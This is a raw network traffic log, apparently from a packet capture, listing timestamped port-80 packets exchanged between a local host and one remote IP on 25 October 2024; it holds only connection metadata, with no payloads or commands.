Oct 25, 2024 05:21:06.666186094 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.666212082 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.666862965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.666897058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.666923046 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.666932106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.666943073 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.666968107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.666990995 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.667035103 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.667629957 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.667676926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.667690992 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.667701006 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.667725086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.667733908 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.667757034 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.667782068 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.668462992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.668530941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.668539047 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.668581009 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.822124004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.822170019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.822227955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.822227955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.822242022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.822278023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.822302103 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.822312117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.822324991 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.822365999 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.822422028 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.822455883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.822475910 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.822489023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.822520971 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.822542906 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.822612047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.822685957 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.822693110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.822721958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.822746992 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.822788954 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.823035002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.823096991 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.823097944 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.823134899 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.823152065 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.823168993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.823177099 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.823204994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.823223114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.823240995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.823262930 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.823287010 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.823929071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.823991060 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.823992014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.824028969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.824047089 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.824062109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.824083090 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.824098110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.824121952 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.824134111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.824146986 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.824188948 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.824846029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.824907064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.824960947 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.824994087 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.825018883 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.825030088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.825041056 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.825062990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.825086117 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.825098991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.825129986 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.825149059 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.825719118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.825782061 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.825783014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.825848103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.825856924 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.825881958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.825905085 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.825916052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.825930119 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.825951099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.825963020 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.826004028 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.826600075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.826659918 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.826663017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.826699972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.826720953 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.826733112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.826745987 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.826767921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.826786041 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.826802969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.826814890 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.826853991 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.827461004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.827495098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.827523947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.827544928 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.827558041 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.827591896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.827610016 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.827625990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.827651978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.827661991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.827678919 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.827717066 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.980170012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.980196953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.980212927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.980226994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.980242968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.980257034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.980273008 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.980288982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.980309010 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.980309963 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.980375051 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.980384111 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.980391979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.980410099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.980423927 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.980426073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.980458021 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.980477095 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.980670929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.980732918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.980766058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.980797052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.980832100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.980856895 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.980856895 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.980858088 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.980858088 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.980952024 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.981105089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.981167078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.981199980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.981231928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.981264114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.981297970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.981303930 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.981304884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.981304884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.981304884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.981304884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.981332064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.981364965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.981389046 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.981389046 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.981400967 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.981420040 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.981453896 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.981714964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.981762886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.981769085 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.981797934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.981818914 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.981849909 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.981878042 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.981911898 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.981933117 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.981946945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.981964111 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.982006073 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.982007980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.982043982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.982063055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.982078075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.982088089 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.982111931 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.982131004 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.982171059 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.982544899 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.982600927 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.982610941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.982669115 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.982677937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.982712030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.982729912 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.982745886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.982759953 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.982781887 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.982794046 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.982819080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.982840061 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.982852936 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.982865095 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.982887030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.982903957 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.982920885 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.982944012 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.982954979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.982965946 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.983005047 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.983555079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.983608961 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.983618975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.983654976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.983673096 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.983686924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.983714104 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.983722925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.983737946 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.983756065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.983776093 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.983791113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.983814955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.983824968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.983854055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.983867884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.983880997 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.983901024 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.983911037 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.983937025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.983959913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.983992100 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.984422922 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.984476089 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.984487057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.984522104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.984544992 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.984555960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.984569073 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.984591007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.984613895 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.984625101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.984643936 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.984659910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.984678030 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.984694958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.984711885 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.984729052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.984754086 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.984761953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.984776020 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.984797955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.984817028 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.984857082 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.985410929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.985467911 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.985475063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.985508919 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.985527039 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.985542059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.985563040 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.985577106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.985586882 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.985610008 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.985635042 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.985645056 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.985656977 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.985677958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.985696077 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.985718012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.985724926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.985752106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.985769987 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.985786915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.985809088 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.985837936 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.986143112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.986197948 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.986334085 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.986367941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.986388922 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.986402035 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.986414909 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.986434937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.986454010 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.986469030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.986475945 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.986502886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.986520052 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.986536980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.986557961 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.986569881 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.986582041 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.986604929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.986622095 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.986639023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.986653090 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.986691952 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.137862921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.137979031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.138078928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.138142109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.138178110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.138197899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.138197899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.138197899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.138197899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.138258934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.138276100 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.138309002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.138324976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.138387918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.138422012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.138454914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.138487101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.138520956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.138523102 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.138524055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.138524055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.138524055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.138550997 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.138608932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.138609886 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.138609886 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.138617039 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.138680935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.138681889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.138714075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.138731956 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.138747931 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.138763905 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.138782024 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.138817072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.138838053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.138838053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.138853073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.138886929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.138892889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.138892889 CEST	49730	80	192.168.2.4	185.215.113.37
